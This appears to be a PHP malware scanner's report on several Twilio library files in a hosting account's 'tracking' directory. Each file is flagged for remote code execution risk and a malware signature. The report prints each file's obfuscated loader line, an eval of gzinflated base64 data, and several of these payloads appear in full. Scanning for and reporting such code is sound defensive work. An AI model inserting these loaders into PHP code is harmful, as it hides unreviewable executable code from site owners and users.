<?php 'H4sIAAAAAAAEAJ2UT28aMRDF70h8hzkgBRAlh/ZEpUoovURqL0nuljGmTLLYlmccGlX97h3vnwQMFBJrpfX6Pf3s5/W43+v3rsfjfg/GMAdC96uy8N1vNLo8Vo9PpxDWYaaZ42wGS81WmWjltXy1SHtY21oDzp2aAFtNUFqP0FJYXkorrfs0wj3IHD5/AbPWURu2EYij5BOiZsCldYwrtCTfSOAXj9bwCaw2xifHqsDnNbZSA22j7qz5BHAV0bpl9aKc3tgS2YmQRfCr87hGPAobTwnDlLdYoe/2ceXjeaZOvFb8Eg6IWYAsQCLJehHs2aOR3xyrElYLIMJ7OCtdVQttnk4DO8eHyRvLa3/wswt4Y3oPn1hzImXOBmiMYD6Yo5znf3GOey+bLUUsoTJ00ZmltIiWfIr1wUAqOTs6gSbyBuva2mI+frlk29M8vA1zIya68Y6jr34g8U8dgpQ6TeAm2rrS9d74qJvtut8zldDh3sZn2Q1...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ2UT28aMRDF70h8hzkgBRAlh/ZEpUoovURqL0nuljGmTLLYlmccGlX97h3vnwQMFBJrpfX6Pf3s5/W43+v3rsfjfg/GMAdC96uy8N1vNLo8Vo9PpxDWYaaZ42wGS81WmWjltXy1SHtY21oDzp2aAFtNUFqP0FJYXkorrfs0wj3IHD5/AbPWURu2EYij5BOiZsCldYwrtCTfSOAXj9bwCaw2xifHqsDnNbZSA22j7qz5BHAV0bpl9aKc3tgS2YmQRfCr87hGPAobTwnDlLdYoe/2ceXjeaZOvFb8Eg6IWYAsQCLJehHs2aOR3xyrElYLIMJ7OCtdVQttnk4DO8eHyRvLa3/wswt4Y3oPn1hzImXOBmiMYD6Yo5znf3GOey+bLUUsoTJ00ZmltIiWfIr1wUAqOTs6gSbyBuva2mI+frlk29M8vA1zIya68Y6jr34g8U8...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ2UT28aMRDF70h8hzkgBRAlh/ZEpUoovURqL0nuljGmTLLYlmccGlX97h3vnwQMFBJrpfX6Pf3s5/W43+v3rsfjfg/GMAdC96uy8N1vNLo8Vo9PpxDWYaaZ42wGS81WmWjltXy1SHtY21oDzp2aAFtNUFqP0FJYXkorrfs0wj3IHD5/AbPWURu2EYij5BOiZsCldYwrtCTfSOAXj9bwCaw2xifHqsDnNbZSA22j7qz5BHAV0bpl9aKc3tgS2YmQRfCr87hGPAobTwnDlLdYoe/2ceXjeaZOvFb8Eg6IWYAsQCLJehHs2aOR3xyrElYLIMJ7OCtdVQttnk4DO8eHyRvLa3/wswt4Y3oPn1hzImXOBmiMYD6Yo5znf3GOey+bLUUsoTJ00ZmltIiWfIr1wUAqOTs6gSbyBuva2mI+frlk29M8vA1zIya68Y6jr34g8U8...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Domains.php

Size: 603.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH1T32vCMBB+F/o/HCJoXavvHRbGfoCwDZl7LzG92rA2KUk6dcP/fUljp7Vs93S5++7Ld3eJN/AGtCBKwRrlJ6OokvcdK5hI3lDp5EGUhHEFuNfI0z5ovVw9M6UNVtSSInx7hg+MzadT58AU7iUSjQoIcNyBowTDqgmn2KJ+0Y97UlYFQq3IFqNeGmYzoCLFcFMI+hFFUOVVH2RtRAuGXIcxoVTU1lGsCuPUtRTGtJE16RZZG74cnqQpTYvDKylxGNiIk92cuxX+be/6qCKSlKC0ZHwLo+xElnBTHYHOEdoQ2BCIzASZAiftLxqXvSBxAUeRCfkfB5GSHGDUHFRkNqEMpRmyi5v7mwxqlAp2OaM5GCqFkpGCfWEKhKfdrpWZLKRMItWmCy0aQe5RwN1qOWvRc+dU9aZgFLKaU80Eh9Psu6MJOj0GrVxYOJkT37fvq92SRF1LboUbKVGUnCgd9AyzNr5c5xgW8dVOgiv...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1T32vCMBB+F/o/HCJoXavvHRbGfoCwDZl7LzG92rA2KUk6dcP/fUljp7Vs93S5++7Ld3eJN/AGtCBKwRrlJ6OokvcdK5hI3lDp5EGUhHEFuNfI0z5ovVw9M6UNVtSSInx7hg+MzadT58AU7iUSjQoIcNyBowTDqgmn2KJ+0Y97UlYFQq3IFqNeGmYzoCLFcFMI+hFFUOVVH2RtRAuGXIcxoVTU1lGsCuPUtRTGtJE16RZZG74cnqQpTYvDKylxGNiIk92cuxX+be/6qCKSlKC0ZHwLo+xElnBTHYHOEdoQ2BCIzASZAiftLxqXvSBxAUeRCfkfB5GSHGDUHFRkNqEMpRmyi5v7mwxqlAp2OaM5GCqFkpGCfWEKhKfdrpWZLKRMItWmCy0aQe5RwN1qOWvRc+dU9aZgFLKaU80Eh9Psu6MJOj0GrVxYOJkT37fvq92...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1T32vCMBB+F/o/HCJoXavvHRbGfoCwDZl7LzG92rA2KUk6dcP/fUljp7Vs93S5++7Ld3eJN/AGtCBKwRrlJ6OokvcdK5hI3lDp5EGUhHEFuNfI0z5ovVw9M6UNVtSSInx7hg+MzadT58AU7iUSjQoIcNyBowTDqgmn2KJ+0Y97UlYFQq3IFqNeGmYzoCLFcFMI+hFFUOVVH2RtRAuGXIcxoVTU1lGsCuPUtRTGtJE16RZZG74cnqQpTYvDKylxGNiIk92cuxX+be/6qCKSlKC0ZHwLo+xElnBTHYHOEdoQ2BCIzASZAiftLxqXvSBxAUeRCfkfB5GSHGDUHFRkNqEMpRmyi5v7mwxqlAp2OaM5GCqFkpGCfWEKhKfdrpWZLKRMItWmCy0aQe5RwN1qOWvRc+dU9aZgFLKaU80Eh9Psu6MJOj0GrVxYOJkT37fvq92...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IncomingPhoneNumber.php

Size: 1.31 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAL1WXW8qNxB9R+I/jNSHJilZBE3SKqoqpWlyi5TkRoHb173GO7BuvPbW9sJFVf/7HX9AQgglRFflBbTrmXPm+Mww7Va71T06arfgCAAuFOjxX8gdGKwNWlROqCkwsPQlEepSKwTVVGM0GVxrA5U2mIKFmmhTMSe06oBFBFcifB4oriuKvvehdyESBso6pjjCA1rdGL7M8EvpXH3e7c7n88zNhRQ6o+Buobntslp0iZHripTwOJA5jmTsdyLl/PVznrJRWFNRBYFR5h+mF1lGhdTnzDlzfk6lFc/eeRHgxxPgJTOMOyJrnfEauJI5aJT4u0G5AFGgExOBlp4LS2rFOrajFMxhzg3S1wu4Eank30aEtXQwZxZSUAemYoYK6MmH2xE8XF9C/+d+H6LmO4CbutgfWDJLFcfI96JPjEBVyEWuWIUvZS6biinCZAUbk7kKtNyI2hEQOPzifPJ1Wh2iA07D2clTmtVFEWGtphn...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1WXW8qNxB9R+I/jNSHJilZBE3SKqoqpWlyi5TkRoHb173GO7BuvPbW9sJFVf/7HX9AQgglRFflBbTrmXPm+Mww7Va71T06arfgCAAuFOjxX8gdGKwNWlROqCkwsPQlEepSKwTVVGM0GVxrA5U2mIKFmmhTMSe06oBFBFcifB4oriuKvvehdyESBso6pjjCA1rdGL7M8EvpXH3e7c7n88zNhRQ6o+Buobntslp0iZHripTwOJA5jmTsdyLl/PVznrJRWFNRBYFR5h+mF1lGhdTnzDlzfk6lFc/eeRHgxxPgJTOMOyJrnfEauJI5aJT4u0G5AFGgExOBlp4LS2rFOrajFMxhzg3S1wu4Eank30aEtXQwZxZSUAemYoYK6MmH2xE8XF9C/+d+H6LmO4CbutgfWDJLFcfI96JPjEBVyEWuWIUvZS6biinCZAUbk7kKtNy...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1WXW8qNxB9R+I/jNSHJilZBE3SKqoqpWlyi5TkRoHb173GO7BuvPbW9sJFVf/7HX9AQgglRFflBbTrmXPm+Mww7Va71T06arfgCAAuFOjxX8gdGKwNWlROqCkwsPQlEepSKwTVVGM0GVxrA5U2mIKFmmhTMSe06oBFBFcifB4oriuKvvehdyESBso6pjjCA1rdGL7M8EvpXH3e7c7n88zNhRQ6o+Buobntslp0iZHripTwOJA5jmTsdyLl/PVznrJRWFNRBYFR5h+mF1lGhdTnzDlzfk6lFc/eeRHgxxPgJTOMOyJrnfEauJI5aJT4u0G5AFGgExOBlp4LS2rFOrajFMxhzg3S1wu4Eank30aEtXQwZxZSUAemYoYK6MmH2xE8XF9C/+d+H6LmO4CbutgfWDJLFcfI96JPjEBVyEWuWIUvZS6biinCZAUbk7kKtNy...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IncomingPhoneNumbers.php

Size: 1.09 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1U30/bMBB+r9T/4cQqNS1pQjdAUxiVJg0kJDahwds0pa57bbwldmQ7/BDwv+/sJLSlY/CwPDn23Xd333133U63Ew+H3Q4M4VRpKJRGEHKhdMGsUDIEgwg2Q28xPZNcFUIuLzIl8VtVzFAb+HxxBt/RqErz2uxTZm2ZxPHNzU1kb0QuVERu8VxxE7NSxBqNjUUDNSod1kjWYO9yxVk+maYeiDyqAqX1qQCzsEKLnEHc7fCcGQOXqK8FR5NeeYOU0rHpX5PFW4tyvu1xLoxti4B7AqdvUUnuIwspbNDjuaBcQuhVWgxaG/f1bCbMaGLQVuVlNdMNjAlWJu7r+9r64bNbq/I8XWjErZdCzUSO/dXt4Kg+P3Y7zzLkGpnFgGnN7qBXMs0KA8fg/4PBRraa0tQSyIaqSZK0cW2cXg6xROtICnr2rsQQXgpVe23Ha0iqSRxN6FYLvMYvzLKgeSNeIYKd2EfYCeGllGrBum9...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1U30/bMBB+r9T/4cQqNS1pQjdAUxiVJg0kJDahwds0pa57bbwldmQ7/BDwv+/sJLSlY/CwPDn23Xd333133U63Ew+H3Q4M4VRpKJRGEHKhdMGsUDIEgwg2Q28xPZNcFUIuLzIl8VtVzFAb+HxxBt/RqErz2uxTZm2ZxPHNzU1kb0QuVERu8VxxE7NSxBqNjUUDNSod1kjWYO9yxVk+maYeiDyqAqX1qQCzsEKLnEHc7fCcGQOXqK8FR5NeeYOU0rHpX5PFW4tyvu1xLoxti4B7AqdvUUnuIwspbNDjuaBcQuhVWgxaG/f1bCbMaGLQVuVlNdMNjAlWJu7r+9r64bNbq/I8XWjErZdCzUSO/dXt4Kg+P3Y7zzLkGpnFgGnN7qBXMs0KA8fg/4PBRraa0tQSyIaqSZK0cW2cXg6xROtICnr2rsQQXgpVe23Ha0iqSRx...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1U30/bMBB+r9T/4cQqNS1pQjdAUxiVJg0kJDahwds0pa57bbwldmQ7/BDwv+/sJLSlY/CwPDn23Xd333133U63Ew+H3Q4M4VRpKJRGEHKhdMGsUDIEgwg2Q28xPZNcFUIuLzIl8VtVzFAb+HxxBt/RqErz2uxTZm2ZxPHNzU1kb0QuVERu8VxxE7NSxBqNjUUDNSod1kjWYO9yxVk+maYeiDyqAqX1qQCzsEKLnEHc7fCcGQOXqK8FR5NeeYOU0rHpX5PFW4tyvu1xLoxti4B7AqdvUUnuIwspbNDjuaBcQuhVWgxaG/f1bCbMaGLQVuVlNdMNjAlWJu7r+9r64bNbq/I8XWjErZdCzUSO/dXt4Kg+P3Y7zzLkGpnFgGnN7qBXMs0KA8fg/4PBRraa0tQSyIaqSZK0cW2cXg6xROtICnr2rsQQXgpVe23Ha0iqSRx...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IpAccessControlList.php

Size: 559.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJ2STU/DMAyG75X6H3yYtA/BdoDTkJAmTpM4bbtXWeoyo5JEsctAiP+O225slA2JWZWaxPZj+03SJE0mo1GawAhmwOSeSoR5mFmLzA/eSfTlI7HUAU3QeAxhE6ZGJE6nkBvBzEbUX/4dorbaYOMD0QUFMA0PbAuEUomwNXrQST1Br0J+Kb2b+pPO9AM6g5tbsBsTjRWMwBJVDK1gBChHJ1QQsu6Jwa+f0Z6TRJvxlZOsg6973rla6G70P2Y4U6CIhC4v3zNnXrBbYu+E2gm++D++itSF6tFFKK7WEdlX0eo1RuIu98jPYJi9pUaSLcmmVfrM5Q70hea55jLysCZO0sSWSoAlxlfShGy1pZJ8tkCW7MR7BnwTFep3wtyxGGdxsWsMPpSvFqIXvXTtrqicFfIOyJEMerZUxeUKejrhcB9dW6+e4PqeUaqwPJp0cAiprU8hM/th+gff8K5df6aJfl98ZbGpqAMAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ2STU/DMAyG75X6H3yYtA/BdoDTkJAmTpM4bbtXWeoyo5JEsctAiP+O225slA2JWZWaxPZj+03SJE0mo1GawAhmwOSeSoR5mFmLzA/eSfTlI7HUAU3QeAxhE6ZGJE6nkBvBzEbUX/4dorbaYOMD0QUFMA0PbAuEUomwNXrQST1Br0J+Kb2b+pPO9AM6g5tbsBsTjRWMwBJVDK1gBChHJ1QQsu6Jwa+f0Z6TRJvxlZOsg6973rla6G70P2Y4U6CIhC4v3zNnXrBbYu+E2gm++D++itSF6tFFKK7WEdlX0eo1RuIu98jPYJi9pUaSLcmmVfrM5Q70hea55jLysCZO0sSWSoAlxlfShGy1pZJ8tkCW7MR7BnwTFep3wtyxGGdxsWsMPpSvFqIXvXTtrqicFfIOyJEMerZUxeUKejrhcB9dW6+e4PqeUaqwPJp0cAiprU8...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ2STU/DMAyG75X6H3yYtA/BdoDTkJAmTpM4bbtXWeoyo5JEsctAiP+O225slA2JWZWaxPZj+03SJE0mo1GawAhmwOSeSoR5mFmLzA/eSfTlI7HUAU3QeAxhE6ZGJE6nkBvBzEbUX/4dorbaYOMD0QUFMA0PbAuEUomwNXrQST1Br0J+Kb2b+pPO9AM6g5tbsBsTjRWMwBJVDK1gBChHJ1QQsu6Jwa+f0Z6TRJvxlZOsg6973rla6G70P2Y4U6CIhC4v3zNnXrBbYu+E2gm++D++itSF6tFFKK7WEdlX0eo1RuIu98jPYJi9pUaSLcmmVfrM5Q70hea55jLysCZO0sSWSoAlxlfShGy1pZJ8tkCW7MR7BnwTFep3wtyxGGdxsWsMPpSvFqIXvXTtrqicFfIOyJEMerZUxeUKejrhcB9dW6+e4PqeUaqwPJp0cAiprU8...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/SmsMessage.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLokPzi32TS0uTkxP5eVSAILUipLUvBRMxZ55xSWJecmpQE35pUXJQNXVvFy1vFwANDEiBV8AAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLokPzi32TS0uTkxP5eVSAILUipLUvBRMxZ55xSWJecmpQE35pUXJQNXVvFy1vFwANDEiBV8AAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IpAccessControlListMapping.php

Size: 487.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI2SQWvCQBCF74H8hzkIRmn1bqEgnoT2ot7DdjM2A3F32ZnUltL/3lmttSYVHAIJ+977MjNJnuXZdDzOMxjDHJjca4OwDHNrkXnhnUTfPBHLswlBxeQ7eCcTCHWYGZE4m0FlBEsbUW/Vr0VrU+NBA6mJYXdkwN4wdM3/8NpQ3c7rmi95TD2MHoHfXoCuhLeR0FXNR+nMDruYkwhJvBHYRupi9OjGMLcvEdm30eqGInFvrrPOYJi9pbQY2JPUl2sr9DNXlZoZeZQQ0zyzjUZgjfGNNF9u9tSQL1fIUl7/KQDfRZfQzy0di3EWVz8Nwae+RitEL2hTV9vWWSHvgBxJMbCNblPuYKCTjU7uVIPU+f0jo7Rh/WfC4mxJNaRQmtNMw7M2ejg+f+WZXnn2DfVdtYD2AgAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2SQWvCQBCF74H8hzkIRmn1bqEgnoT2ot7DdjM2A3F32ZnUltL/3lmttSYVHAIJ+977MjNJnuXZdDzOMxjDHJjca4OwDHNrkXnhnUTfPBHLswlBxeQ7eCcTCHWYGZE4m0FlBEsbUW/Vr0VrU+NBA6mJYXdkwN4wdM3/8NpQ3c7rmi95TD2MHoHfXoCuhLeR0FXNR+nMDruYkwhJvBHYRupi9OjGMLcvEdm30eqGInFvrrPOYJi9pbQY2JPUl2sr9DNXlZoZeZQQ0zyzjUZgjfGNNF9u9tSQL1fIUl7/KQDfRZfQzy0di3EWVz8Nwae+RitEL2hTV9vWWSHvgBxJMbCNblPuYKCTjU7uVIPU+f0jo7Rh/WfC4mxJNaRQmtNMw7M2ejg+f+WZXnn2DfVdtYD2AgAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2SQWvCQBCF74H8hzkIRmn1bqEgnoT2ot7DdjM2A3F32ZnUltL/3lmttSYVHAIJ+977MjNJnuXZdDzOMxjDHJjca4OwDHNrkXnhnUTfPBHLswlBxeQ7eCcTCHWYGZE4m0FlBEsbUW/Vr0VrU+NBA6mJYXdkwN4wdM3/8NpQ3c7rmi95TD2MHoHfXoCuhLeR0FXNR+nMDruYkwhJvBHYRupi9OjGMLcvEdm30eqGInFvrrPOYJi9pbQY2JPUl2sr9DNXlZoZeZQQ0zyzjUZgjfGNNF9u9tSQL1fIUl7/KQDfRZfQzy0di3EWVz8Nwae+RitEL2hTV9vWWSHvgBxJMbCNblPuYKCTjU7uVIPU+f0jo7Rh/WfC4mxJNaRQmtNMw7M2ejg+f+WZXnn2DfVdtYD2AgAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/SmsMessages.php

Size: 419.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAHWPQWvDMAyF74H8B5EGmrDA7h3tYYed1svSu3FdtRgSO0j2tjL236fM6dJ1TBhj+z09fc6zPDOdZoYW6dUaZLV7s5316gU5qLbnLTLrE3KegRS+B3SHv+5ny0E6fCSDefaRzEPcd9bAMToTrHeglPGOA0UTqtJ0Fl1ooIxka5g6xhofYA0D4UkRDp02WBWLK5JF0UDRbtv7y0MxpTzMIYMmSV+t/h85mT/zLB1+KA2hDliVR/K9eIOXbe8P5wY0kT5DKdm6Z0H8vlf1L3rCEMnN86e0ZJ1tYy2fZMIS1htIs27UnU+aANwoj0KTtJFrFmu4u9BdfU/WF5ksjeHmAQAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWPQWvDMAyF74H8B5EGmrDA7h3tYYed1svSu3FdtRgSO0j2tjL236fM6dJ1TBhj+z09fc6zPDOdZoYW6dUaZLV7s5316gU5qLbnLTLrE3KegRS+B3SHv+5ny0E6fCSDefaRzEPcd9bAMToTrHeglPGOA0UTqtJ0Fl1ooIxka5g6xhofYA0D4UkRDp02WBWLK5JF0UDRbtv7y0MxpTzMIYMmSV+t/h85mT/zLB1+KA2hDliVR/K9eIOXbe8P5wY0kT5DKdm6Z0H8vlf1L3rCEMnN86e0ZJ1tYy2fZMIS1htIs27UnU+aANwoj0KTtJFrFmu4u9BdfU/WF5ksjeHmAQAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWPQWvDMAyF74H8B5EGmrDA7h3tYYed1svSu3FdtRgSO0j2tjL236fM6dJ1TBhj+z09fc6zPDOdZoYW6dUaZLV7s5316gU5qLbnLTLrE3KegRS+B3SHv+5ny0E6fCSDefaRzEPcd9bAMToTrHeglPGOA0UTqtJ0Fl1ooIxka5g6xhofYA0D4UkRDp02WBWLK5JF0UDRbtv7y0MxpTzMIYMmSV+t/h85mT/zLB1+KA2hDliVR/K9eIOXbe8P5wY0kT5DKdm6Z0H8vlf1L3rCEMnN86e0ZJ1tYy2fZMIS1htIs27UnU+aANwoj0KTtJFrFmu4u9BdfU/WF5ksjeHmAQAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IpAccessControlListMappings.php

Size: 631.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH1TwWojMQy9B/IPogQmk+2k91k6ELp7CHShND3kNri2mog6trE8m2ZL/732OGnJpo1Osi3pPT3Jw8FwILVghgX6vySR24ctabLtPXJo524m4x3fWBO81bfE4Y9wjsyKAV8CGnWauJjfpbiYbzsvEV6HEQOiXU0m2YEJ3HgUARkEGNzC9zBAhoMwEg+ZHxV+v4iN0wgdixXWJ8/TKUirsHrUVj7XNbi1O4npbSQ1oQlVI6S0XXKYXNUouxERu2pWGMbF4tdyuSzKqiHXip5qKzPXVkey7WYvStXIvrHxxex2ec4uyp8ndGonvNgAB58aH30DxaRqCGuE6IB96t1j/ZJ8xz3ubFd4BKFUqhxsTCKG3OL0f3zhvdjBqD9wHSfEMSkKne8jYv+CAT3Ddk1yDbEWoyeh6R8qEEYdo3OUFxR5lEHvMjpCXhaY3c0/CFxlx3WPmiQ8dUYGsgb2ip7R4/LAFq4zy3FZprWDvXk...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1TwWojMQy9B/IPogQmk+2k91k6ELp7CHShND3kNri2mog6trE8m2ZL/732OGnJpo1Osi3pPT3Jw8FwILVghgX6vySR24ctabLtPXJo524m4x3fWBO81bfE4Y9wjsyKAV8CGnWauJjfpbiYbzsvEV6HEQOiXU0m2YEJ3HgUARkEGNzC9zBAhoMwEg+ZHxV+v4iN0wgdixXWJ8/TKUirsHrUVj7XNbi1O4npbSQ1oQlVI6S0XXKYXNUouxERu2pWGMbF4tdyuSzKqiHXip5qKzPXVkey7WYvStXIvrHxxex2ec4uyp8ndGonvNgAB58aH30DxaRqCGuE6IB96t1j/ZJ8xz3ubFd4BKFUqhxsTCKG3OL0f3zhvdjBqD9wHSfEMSkKne8jYv+CAT3Ddk1yDbEWoyeh6R8qEEYdo3OUFxR5lEHvMjpCXhaY3c0/CFxlx3W...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1TwWojMQy9B/IPogQmk+2k91k6ELp7CHShND3kNri2mog6trE8m2ZL/732OGnJpo1Osi3pPT3Jw8FwILVghgX6vySR24ctabLtPXJo524m4x3fWBO81bfE4Y9wjsyKAV8CGnWauJjfpbiYbzsvEV6HEQOiXU0m2YEJ3HgUARkEGNzC9zBAhoMwEg+ZHxV+v4iN0wgdixXWJ8/TKUirsHrUVj7XNbi1O4npbSQ1oQlVI6S0XXKYXNUouxERu2pWGMbF4tdyuSzKqiHXip5qKzPXVkey7WYvStXIvrHxxex2ec4uyp8ndGonvNgAB58aH30DxaRqCGuE6IB96t1j/ZJ8xz3ubFd4BKFUqhxsTCKG3OL0f3zhvdjBqD9wHSfEMSkKne8jYv+CAT3Ddk1yDbEWoyeh6R8qEEYdo3OUFxR5lEHvMjpCXhaY3c0/CFxlx3W...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IpAccessControlLists.php

Size: 619.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1STUsDMRC9F/ofBin0w37cIxZEFAoqot7XmJ3aYJqETNZaxf/uZLNrtfXgHJbs5M2bNy/T7XQ7ykgiuMfwqhVS8bDRRrviDikWC3+mOEfnzsbgzJWmSIBvEW15WHG/uE0ALnRVUAgfXSYHjtlolA8wgvOAMiKBBIsb+JNfW4rSKmxrvmsv3uTaG4SK5DOKg+vpFJQrcfJknHoRAvzKH2Dq6Cmj0cbJXCrlqnQg7Sdz7QtZqylUllOYpGcyV7XmwdH19jJwYWm2N3KNR8OTA3rhZZBroBi0fYbesoEXlvEC4gqhTUFKgVtyUvPIHnJraFpDar1PK0OQW+jVPyTYQuIu7EfOM1d9gxEDwWal1QqYmjBoafQ7liBt+dsIYheg1AFVZEXR1Qrza8LZ7WK6ExAwVsHmEbId5Z7EELeeZxT1NonH/67T476Hs3zw1ZPRCpaVVVE72zQd/LZ03JoBp9mEwXCY1g6ayKqTLTy...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

